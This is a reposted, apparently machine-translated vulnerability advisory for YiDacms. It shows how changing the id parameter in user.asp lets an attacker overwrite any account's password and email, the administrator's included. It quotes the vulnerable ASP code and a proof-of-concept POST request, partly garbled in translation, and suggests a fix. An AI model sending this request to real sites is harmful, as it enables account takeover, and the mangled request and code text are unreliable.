YiDacms arbitrary user account Reset Vulnerability (including administrator)

Source: Internet
Author: User

YiDacms arbitrary user account Reset Vulnerability (including administrator)

YiDacms arbitrary user account reset vulnerability, not only Password

This password reset problem was my first time, completely balancing permissions.


However, it is probably a programmer's problem. modifying user information not only does not determine the user's attributes, but directly modifies the user information based on the id. In addition, you can check the user's email and password, then I submitted it together...

For this reason, you can directly change the user password when you modify the information for the first time, and you can change the password and email together. Therefore, you do not need to find the account and directly change it to the account you want !!!

Look at the Code:

/Yidacms/user. asp file:

If request ("yidacms") = "system" Thenset rs = server. createobject ("adodb. recordset ") user_id = cint (request (" id ") SQL =" select * from shuaiweb_user WHERE id = "& user_id &" rs. open SQL, dbok, 1, 1if session ("shuaiweb_useremail") = "" thenresponse. write "Please log on again! "Response. endend ifif Request. Form (" shuaiweb_username ") =" "then response. write" <script language = javascript> alert ('name cannot be blank! '); History. go (-1); </script> "response. endend ifset rs = server. createobject ("adodb. recordset ") SQL =" select * from shuaiweb_user WHERE id = "& user_id &" rs. open SQL, dbok, 1, 3rs ("shuaiweb_useremail") = filter_Str (trim (request. form ("shuaiweb_useremail") rs ("shuaiweb_userpass") = filter_Str (trim (request. form ("shuaiweb_userpass") rs ("shuaiweb_username") = filter_Str (trim (request. form ("shuaiweb_username") rs ("shua Iweb_usertel ") = filter_Str (trim (request. form ("shuaiweb_usertel") rs ("shuaiweb_userqq") = filter_Str (trim (request. form ("shuaiweb_userqq") rs ("shuaiweb_usermsn") = filter_Str (trim (request. form ("shuaiweb_usermsn") rs ("shuaiweb_useraddress") = filter_Str (trim (request. form ("shuaiweb_useraddress") rs ("shuaiweb_userportrait") = filter_Str (trim (request. form ("shuaiweb_userportrait") rs ("shuaiweb_usernote") = fil Ter_Str (trim (request. form ("shuaiweb_usernote") rs ("shuaiweb_usernumber") = filter_Str (trim (request. form ("shuaiweb_usernumber") rs. updaters. closeset rs = nothingresponse. write "<script language = javascript> alert ('modification successful! '); Location. replace ('user _ system. asp'); parent. location. reload (); </script> "End If



As you can see, here the modification is: directly bringing shuaiweb_useremail and shuaiweb_userpass

There is no judgment:

The request for modifying user information is as follows:

Link: http: // 10.65.40.6/Yidacms/user. asp? Yidacms = system & id = 3 POST: response & shuaiweb_usernumber = 222 & response = 13122222222 & response = 222222 & response = 222222% 40222.com& shuaiweb_useraddress = 222222 & shuaiweb_usernote = 222222 & shuaiweb_useremail = 222222% 40222.com& response = Response & Submit = % CC % E1 % BD % BB


Id is the user id

We modify the id here to modify the user information corresponding to the id, which includes the user name and password.
 



Let's take a look at the vulnerability proof.

 

Let's take a look at the user information of user id = 4,222222 @ 222.com:
 



The password here

Send request:
 

http://10.65.40.6/Yidacms/user/user.asp?yidacms=system&id=4 

Response & shuaiweb_usernumber = 222 & response = 13122222222 & response = 222222 & response = 222222% 40222.com& shuaiweb_useraddress = 222222 & shuaiweb_usernote = 222222 & shuaiweb_useremail = 222222% 40222.com& response = Response & Submit = % CC % E1 % BD % BB and then look at the user's 222222@222.com Password
 



The password has been modified.

Other information of general users can be modified at will.



This vulnerability allows you to instantly modify the account information of all users.

Admin id = 1. This is an account that already exists when the program is installed by default. You can directly modify the administrator account ..

Solution:

Modifying user information is to determine the attributes of the current Login User

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.